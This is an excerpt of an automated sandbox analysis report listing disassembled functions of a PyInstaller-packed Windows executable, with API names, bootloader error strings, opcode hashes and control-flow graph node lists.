                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00007FF6313D7CD6,?,00007FF6313D1785), ref: 00007FF6313D8A4E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                                                                      • Opcode ID: 4e255e83b5d1bb2cdce6492e0eeffc31e39c0aad847d15d4e42a622511608fb7
                                                                                                                                                                      • Instruction ID: 0ee5ded8e1428842fe4924648ec1665a5eef7a8edea3af53b1db3ee58b2ff2ec
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e255e83b5d1bb2cdce6492e0eeffc31e39c0aad847d15d4e42a622511608fb7
                                                                                                                                                                      • Instruction Fuzzy Hash: 56414232A1C78682FB509F51E4446AA73A1FF85794F441231EAAE877E9DF3CE548D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D1A40 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock$Message
                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 677216364-1384898525
                                                                                                                                                                      • Opcode ID: d146c9a082a1dfd7af869683ec2c14ded0498efbf720b4fe8021dfa40491d494
                                                                                                                                                                      • Instruction ID: 7d284d2c4a2267529b7358f1897c38ec0d7f9f138eda02d07efffb9719a860c2
                                                                                                                                                                      • Opcode Fuzzy Hash: d146c9a082a1dfd7af869683ec2c14ded0498efbf720b4fe8021dfa40491d494
                                                                                                                                                                      • Instruction Fuzzy Hash: 705168B2F0964286FB24DF28E5801B977A0EF48B84F558135EA0CC7799DE3CE984DB44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                      • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                      • API String ID: 2895956056-3524285272
                                                                                                                                                                      • Opcode ID: fafdda5ddf50bf931e4371b54ee8bd5a967635855b06c6fad95867fb7cb72d2f
                                                                                                                                                                      • Instruction ID: 9cd9f6a53e1f014b8bb5ad9ba312c7d75d0d2c2567bcf4afe5624a8bdcf771ae
                                                                                                                                                                      • Opcode Fuzzy Hash: fafdda5ddf50bf931e4371b54ee8bd5a967635855b06c6fad95867fb7cb72d2f
                                                                                                                                                                      • Instruction Fuzzy Hash: A9415432E0878282FB20DB24E4452AAB3A4FF94364F401739E6AD877D9DF7CD5449B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D1000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 264COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 381 7ff6313d1000-7ff6313d3986 call 7ff6313dff10 call 7ff6313dff08 call 7ff6313d8660 call 7ff6313dff08 call 7ff6313dbc10 call 7ff6313e5100 call 7ff6313e5da4 call 7ff6313d1e50 399 7ff6313d3a82 381->399 400 7ff6313d398c-7ff6313d399c call 7ff6313d3e70 381->400 402 7ff6313d3a87-7ff6313d3aa7 call 7ff6313dbc70 399->402 400->399 405 7ff6313d39a2-7ff6313d39b5 call 7ff6313d3d40 400->405 405->399 409 7ff6313d39bb-7ff6313d39e2 call 7ff6313d7b10 405->409 412 7ff6313d3a24-7ff6313d3a4c call 7ff6313d7ff0 call 7ff6313d1c50 409->412 413 7ff6313d39e4-7ff6313d39f3 call 7ff6313d7b10 409->413 423 7ff6313d3a52-7ff6313d3a68 call 7ff6313d1c50 412->423 424 7ff6313d3b21-7ff6313d3b32 412->424 413->412 419 7ff6313d39f5-7ff6313d39fb 413->419 421 7ff6313d39fd-7ff6313d3a05 419->421 422 7ff6313d3a07-7ff6313d3a21 call 7ff6313e4f2c call 7ff6313d7ff0 419->422 421->422 422->412 440 7ff6313d3a6a-7ff6313d3a7d call 7ff6313d2ad0 423->440 441 7ff6313d3aa8-7ff6313d3aab 423->441 427 7ff6313d3b34-7ff6313d3b3b 424->427 428 7ff6313d3b4e-7ff6313d3b51 424->428 427->428 430 7ff6313d3b3d-7ff6313d3b40 call 7ff6313d14f0 427->430 432 7ff6313d3b53-7ff6313d3b59 428->432 433 7ff6313d3b67-7ff6313d3b7f call 7ff6313d8a90 428->433 443 7ff6313d3b45-7ff6313d3b48 430->443 437 7ff6313d3b9f-7ff6313d3bac call 7ff6313d6d90 432->437 438 7ff6313d3b5b-7ff6313d3b65 432->438 448 7ff6313d3b92-7ff6313d3b99 SetDllDirectoryW 433->448 449 7ff6313d3b81-7ff6313d3b8d call 7ff6313d2ad0 433->449 451 7ff6313d3bae-7ff6313d3bbb call 7ff6313d6a40 437->451 452 7ff6313d3bf7-7ff6313d3bfc call 7ff6313d6d10 437->452 438->433 438->437 440->399 441->424 442 7ff6313d3aad-7ff6313d3ac4 call 7ff6313d3f80 441->442 456 7ff6313d3acb-7ff6313d3af7 call 7ff6313d8260 442->456 457 7ff6313d3ac6-7ff6313d3ac9 442->457 443->399 443->428 448->437 449->399 451->452 466 7ff6313d3bbd-7ff6313d3bcc call 7ff6313d65a0 451->466 460 7ff6313d3c01-7ff6313d3c04 452->460 456->424 472 7ff6313d3af9-7ff6313d3b01 call 7ff6313e013c 456->472 462 7ff6313d3b06-7ff6313d3b1c call 7ff6313d2ad0 457->462 464 7ff6313d3c0a-7ff6313d3c17 460->464 465 7ff6313d3cb6-7ff6313d3cc5 call 7ff6313d3470 460->465 462->399 469 7ff6313d3c20-7ff6313d3c2a 464->469 465->399 483 7ff6313d3ccb-7ff6313d3d1f call 7ff6313d7f80 call 7ff6313d7b10 call 7ff6313d35d0 call 7ff6313d8030 call 7ff6313d67f0 call 7ff6313d6d10 465->483 481 7ff6313d3bce-7ff6313d3bda call 7ff6313d6520 466->481 482 7ff6313d3bed-7ff6313d3bf2 call 7ff6313d67f0 466->482 474 7ff6313d3c33-7ff6313d3c35 469->474 475 7ff6313d3c2c-7ff6313d3c31 469->475 472->462 479 7ff6313d3c81-7ff6313d3cb1 call 7ff6313d35d0 call 7ff6313d3410 call 7ff6313d35c0 call 7ff6313d67f0 call 7ff6313d6d10 474->479 480 7ff6313d3c37-7ff6313d3c5a call 7ff6313d1e90 474->480 475->469 475->474 479->402 480->399 494 7ff6313d3c60-7ff6313d3c6a 480->494 481->482 495 7ff6313d3bdc-7ff6313d3beb call 7ff6313d6be0 481->495 482->452 517 7ff6313d3d21-7ff6313d3d28 call 7ff6313d7cf0 483->517 518 7ff6313d3d2d-7ff6313d3d30 call 7ff6313d1e20 483->518 498 7ff6313d3c70-7ff6313d3c7f 494->498 495->460 498->479 498->498 517->518 521 7ff6313d3d35-7ff6313d3d37 518->521 521->402
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6313D3E70: GetModuleFileNameW.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D3EA1
                                                                                                                                                                      • SetDllDirectoryW.KERNEL32 ref: 00007FF6313D3B99
                                                                                                                                                                        • Part of subcall function 00007FF6313D7B10: GetEnvironmentVariableW.KERNEL32(00007FF6313D39CF), ref: 00007FF6313D7B4A
                                                                                                                                                                        • Part of subcall function 00007FF6313D7B10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6313D7B67
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                                                                      • Opcode ID: 7b51eefae9aff9e022c9cc253df53feff55f59b32aa123631ecb9f23d38996e3
                                                                                                                                                                      • Instruction ID: b73240ea5aef7a879209e88b326be2890a7ed347bb5a4be988735a6dd74fab9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b51eefae9aff9e022c9cc253df53feff55f59b32aa123631ecb9f23d38996e3
                                                                                                                                                                      • Instruction Fuzzy Hash: EAB18EA1F1D68341FF24AB2198512FD6291FF44784F444135EA5DC779AEE3CEA05E702
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 522 7ff6313d1050-7ff6313d10ab call 7ff6313db490 525 7ff6313d10d3-7ff6313d10eb call 7ff6313e4f40 522->525 526 7ff6313d10ad-7ff6313d10d2 call 7ff6313d2ad0 522->526 531 7ff6313d10ed-7ff6313d1104 call 7ff6313d2830 525->531 532 7ff6313d1109-7ff6313d1119 call 7ff6313e4f40 525->532 537 7ff6313d126c-7ff6313d12a0 call 7ff6313db170 call 7ff6313e4f2c * 2 531->537 538 7ff6313d111b-7ff6313d1132 call 7ff6313d2830 532->538 539 7ff6313d1137-7ff6313d1147 532->539 538->537 540 7ff6313d1150-7ff6313d1175 call 7ff6313e048c 539->540 548 7ff6313d125e 540->548 549 7ff6313d117b-7ff6313d1185 call 7ff6313e0200 540->549 551 7ff6313d1264 548->551 549->548 556 7ff6313d118b-7ff6313d1197 549->556 551->537 557 7ff6313d11a0-7ff6313d11c8 call 7ff6313d9940 556->557 560 7ff6313d1241-7ff6313d125c call 7ff6313d2ad0 557->560 561 7ff6313d11ca-7ff6313d11cd 557->561 560->551 562 7ff6313d11cf-7ff6313d11d9 561->562 563 7ff6313d123c 561->563 565 7ff6313d1203-7ff6313d1206 562->565 566 7ff6313d11db-7ff6313d11e8 call 7ff6313e0bcc 562->566 563->560 568 7ff6313d1208-7ff6313d1216 call 7ff6313dc9f0 565->568 569 7ff6313d1219-7ff6313d121e 565->569 573 7ff6313d11ed-7ff6313d11f0 566->573 568->569 569->557 572 7ff6313d1220-7ff6313d1223 569->572 575 7ff6313d1225-7ff6313d1228 572->575 576 7ff6313d1237-7ff6313d123a 572->576 577 7ff6313d11f2-7ff6313d11fc call 7ff6313e0200 573->577 578 7ff6313d11fe-7ff6313d1201 573->578 575->560 580 7ff6313d122a-7ff6313d1232 575->580 576->551 577->569 577->578 578->560 580->540
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                      • API String ID: 2030045667-1655038675
                                                                                                                                                                      • Opcode ID: 499c5a6bbd1c96496fa219fb3f1336f4817f728ffc641d182fda7f11e14b9e67
                                                                                                                                                                      • Instruction ID: 90eddba96396f399075da283076ab1bc668c8daa0b80502860e38f7a18a95ee0
                                                                                                                                                                      • Opcode Fuzzy Hash: 499c5a6bbd1c96496fa219fb3f1336f4817f728ffc641d182fda7f11e14b9e67
                                                                                                                                                                      • Instruction Fuzzy Hash: AD518EB2E0D68286FB60AB61E4403BA6291FF85794F484135EE4DC7799EF3CE945E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EF080 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6313EF41A,?,?,-00000018,00007FF6313EB1C7,?,?,?,00007FF6313EB0BE,?,?,?,00007FF6313E6302), ref: 00007FF6313EF1FC
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6313EF41A,?,?,-00000018,00007FF6313EB1C7,?,?,?,00007FF6313EB0BE,?,?,?,00007FF6313E6302), ref: 00007FF6313EF208
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                      • Opcode ID: 51859395d0e275caf5d2b073e71f005ee4f098fce477efb6989a4a0f7b6cb53b
                                                                                                                                                                      • Instruction ID: 101524dd5e4d62da1ba3ac28bb2d21a6c43ac3f9a3d8b7f7a004e016d9d3facd
                                                                                                                                                                      • Opcode Fuzzy Hash: 51859395d0e275caf5d2b073e71f005ee4f098fce477efb6989a4a0f7b6cb53b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6641FF62F19B0251FB16CB169C006B52399BF4ABE0F095535DD1DD7784EE7CEA04A310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EBECC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 679 7ff6313ebecc-7ff6313ebef2 680 7ff6313ebef4-7ff6313ebf08 call 7ff6313e52b4 call 7ff6313e52d4 679->680 681 7ff6313ebf0d-7ff6313ebf11 679->681 697 7ff6313ec2fe 680->697 683 7ff6313ec2e7-7ff6313ec2f3 call 7ff6313e52b4 call 7ff6313e52d4 681->683 684 7ff6313ebf17-7ff6313ebf1e 681->684 703 7ff6313ec2f9 call 7ff6313ead54 683->703 684->683 686 7ff6313ebf24-7ff6313ebf52 684->686 686->683 689 7ff6313ebf58-7ff6313ebf5f 686->689 692 7ff6313ebf61-7ff6313ebf73 call 7ff6313e52b4 call 7ff6313e52d4 689->692 693 7ff6313ebf78-7ff6313ebf7b 689->693 692->703 695 7ff6313ec2e3-7ff6313ec2e5 693->695 696 7ff6313ebf81-7ff6313ebf87 693->696 700 7ff6313ec301-7ff6313ec318 695->700 696->695 701 7ff6313ebf8d-7ff6313ebf90 696->701 697->700 701->692 704 7ff6313ebf92-7ff6313ebfb7 701->704 703->697 707 7ff6313ebfea-7ff6313ebff1 704->707 708 7ff6313ebfb9-7ff6313ebfbb 704->708 712 7ff6313ebff3-7ff6313ec01b call 7ff6313eda6c call 7ff6313eadbc * 2 707->712 713 7ff6313ebfc6-7ff6313ebfdd call 7ff6313e52b4 call 7ff6313e52d4 call 7ff6313ead54 707->713 710 7ff6313ebfe2-7ff6313ebfe8 708->710 711 7ff6313ebfbd-7ff6313ebfc4 708->711 716 7ff6313ec068-7ff6313ec07f 710->716 711->710 711->713 740 7ff6313ec01d-7ff6313ec033 call 7ff6313e52d4 call 7ff6313e52b4 712->740 741 7ff6313ec038-7ff6313ec063 call 7ff6313ec6f4 712->741 744 7ff6313ec170 713->744 719 7ff6313ec081-7ff6313ec089 716->719 720 7ff6313ec0fa-7ff6313ec104 call 7ff6313f3e3c 716->720 719->720 721 7ff6313ec08b-7ff6313ec08d 719->721 732 7ff6313ec18e 720->732 733 7ff6313ec10a-7ff6313ec11f 720->733 721->720 725 7ff6313ec08f-7ff6313ec0a5 721->725 725->720 729 7ff6313ec0a7-7ff6313ec0b3 725->729 729->720 734 7ff6313ec0b5-7ff6313ec0b7 729->734 736 7ff6313ec193-7ff6313ec1b3 ReadFile 732->736 733->732 738 7ff6313ec121-7ff6313ec133 GetConsoleMode 733->738 734->720 739 7ff6313ec0b9-7ff6313ec0d1 734->739 742 7ff6313ec2ad-7ff6313ec2b6 GetLastError 736->742 743 7ff6313ec1b9-7ff6313ec1c1 736->743 738->732 745 7ff6313ec135-7ff6313ec13d 738->745 739->720 749 7ff6313ec0d3-7ff6313ec0df 739->749 740->744 741->716 746 7ff6313ec2d3-7ff6313ec2d6 742->746 747 7ff6313ec2b8-7ff6313ec2ce call 7ff6313e52d4 call 7ff6313e52b4 742->747 743->742 751 7ff6313ec1c7 743->751 748 7ff6313ec173-7ff6313ec17d call 7ff6313eadbc 744->748 745->736 753 7ff6313ec13f-7ff6313ec161 ReadConsoleW 745->753 757 7ff6313ec2dc-7ff6313ec2de 746->757 758 7ff6313ec169-7ff6313ec16b call 7ff6313e5248 746->758 747->744 748->700 749->720 756 7ff6313ec0e1-7ff6313ec0e3 749->756 760 7ff6313ec1ce-7ff6313ec1e3 751->760 762 7ff6313ec182-7ff6313ec18c 753->762 763 7ff6313ec163 GetLastError 753->763 756->720 767 7ff6313ec0e5-7ff6313ec0f5 756->767 757->748 758->744 760->748 769 7ff6313ec1e5-7ff6313ec1f0 760->769 762->760 763->758 767->720 772 7ff6313ec1f2-7ff6313ec20b call 7ff6313ebae4 769->772 773 7ff6313ec217-7ff6313ec21f 769->773 781 7ff6313ec210-7ff6313ec212 772->781 774 7ff6313ec221-7ff6313ec233 773->774 775 7ff6313ec29b-7ff6313ec2a8 call 7ff6313eb924 773->775 778 7ff6313ec235 774->778 779 7ff6313ec28e-7ff6313ec296 774->779 775->781 782 7ff6313ec23a-7ff6313ec241 778->782 779->748 781->748 784 7ff6313ec243-7ff6313ec247 782->784 785 7ff6313ec27d-7ff6313ec288 782->785 786 7ff6313ec263 784->786 787 7ff6313ec249-7ff6313ec250 784->787 785->779 789 7ff6313ec269-7ff6313ec279 786->789 787->786 788 7ff6313ec252-7ff6313ec256 787->788 788->786 790 7ff6313ec258-7ff6313ec261 788->790 789->782 791 7ff6313ec27b 789->791 790->789 791->779
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 155280e7eec12617aa58257054cdd625bf5da88935439d5fe27c70127b1b473f
                                                                                                                                                                      • Instruction ID: 68f82bc52f7538f72a0ed32725b27e46c022e7ba28a11af8112fac235540b487
                                                                                                                                                                      • Opcode Fuzzy Hash: 155280e7eec12617aa58257054cdd625bf5da88935439d5fe27c70127b1b473f
                                                                                                                                                                      • Instruction Fuzzy Hash: F7C10223E0C78691FB618B5594402BE7BA1FF81B80F552131EA4E87391CE7DEE59E720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313ED3D0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 902 7ff6313ed3d0-7ff6313ed3f5 903 7ff6313ed6c3 902->903 904 7ff6313ed3fb-7ff6313ed3fe 902->904 907 7ff6313ed6c5-7ff6313ed6d5 903->907 905 7ff6313ed400-7ff6313ed432 call 7ff6313eac88 904->905 906 7ff6313ed437-7ff6313ed463 904->906 905->907 909 7ff6313ed465-7ff6313ed46c 906->909 910 7ff6313ed46e-7ff6313ed474 906->910 909->905 909->910 912 7ff6313ed484-7ff6313ed499 call 7ff6313f3e3c 910->912 913 7ff6313ed476-7ff6313ed47f call 7ff6313ec790 910->913 917 7ff6313ed5b3-7ff6313ed5bc 912->917 918 7ff6313ed49f-7ff6313ed4a8 912->918 913->912 919 7ff6313ed610-7ff6313ed635 WriteFile 917->919 920 7ff6313ed5be-7ff6313ed5c4 917->920 918->917 921 7ff6313ed4ae-7ff6313ed4b2 918->921 922 7ff6313ed640 919->922 923 7ff6313ed637-7ff6313ed63d GetLastError 919->923 924 7ff6313ed5fc-7ff6313ed60e call 7ff6313ece88 920->924 925 7ff6313ed5c6-7ff6313ed5c9 920->925 926 7ff6313ed4b4-7ff6313ed4bc call 7ff6313e48b0 921->926 927 7ff6313ed4c3-7ff6313ed4ce 921->927 931 7ff6313ed643 922->931 923->922 946 7ff6313ed5a0-7ff6313ed5a7 924->946 932 7ff6313ed5cb-7ff6313ed5ce 925->932 933 7ff6313ed5e8-7ff6313ed5fa call 7ff6313ed0a8 925->933 926->927 928 7ff6313ed4d0-7ff6313ed4d9 927->928 929 7ff6313ed4df-7ff6313ed4f4 GetConsoleMode 927->929 928->917 928->929 937 7ff6313ed5ac 929->937 938 7ff6313ed4fa-7ff6313ed500 929->938 940 7ff6313ed648 931->940 941 7ff6313ed654-7ff6313ed65e 932->941 942 7ff6313ed5d4-7ff6313ed5e6 call 7ff6313ecf8c 932->942 933->946 937->917 944 7ff6313ed589-7ff6313ed59b call 7ff6313eca10 938->944 945 7ff6313ed506-7ff6313ed509 938->945 947 7ff6313ed64d 940->947 948 7ff6313ed660-7ff6313ed665 941->948 949 7ff6313ed6bc-7ff6313ed6c1 941->949 942->946 944->946 952 7ff6313ed514-7ff6313ed522 945->952 953 7ff6313ed50b-7ff6313ed50e 945->953 946->940 947->941 954 7ff6313ed693-7ff6313ed69d 948->954 955 7ff6313ed667-7ff6313ed66a 948->955 949->907 959 7ff6313ed524 952->959 960 7ff6313ed580-7ff6313ed584 952->960 953->947 953->952 957 7ff6313ed6a4-7ff6313ed6b3 954->957 958 7ff6313ed69f-7ff6313ed6a2 954->958 961 7ff6313ed683-7ff6313ed68e call 7ff6313e5290 955->961 962 7ff6313ed66c-7ff6313ed67b 955->962 957->949 958->903 958->957 964 7ff6313ed528-7ff6313ed53f call 7ff6313f3f08 959->964 960->931 961->954 962->961 968 7ff6313ed541-7ff6313ed54d 964->968 969 7ff6313ed577-7ff6313ed57d GetLastError 964->969 970 7ff6313ed54f-7ff6313ed561 call 7ff6313f3f08 968->970 971 7ff6313ed56c-7ff6313ed573 968->971 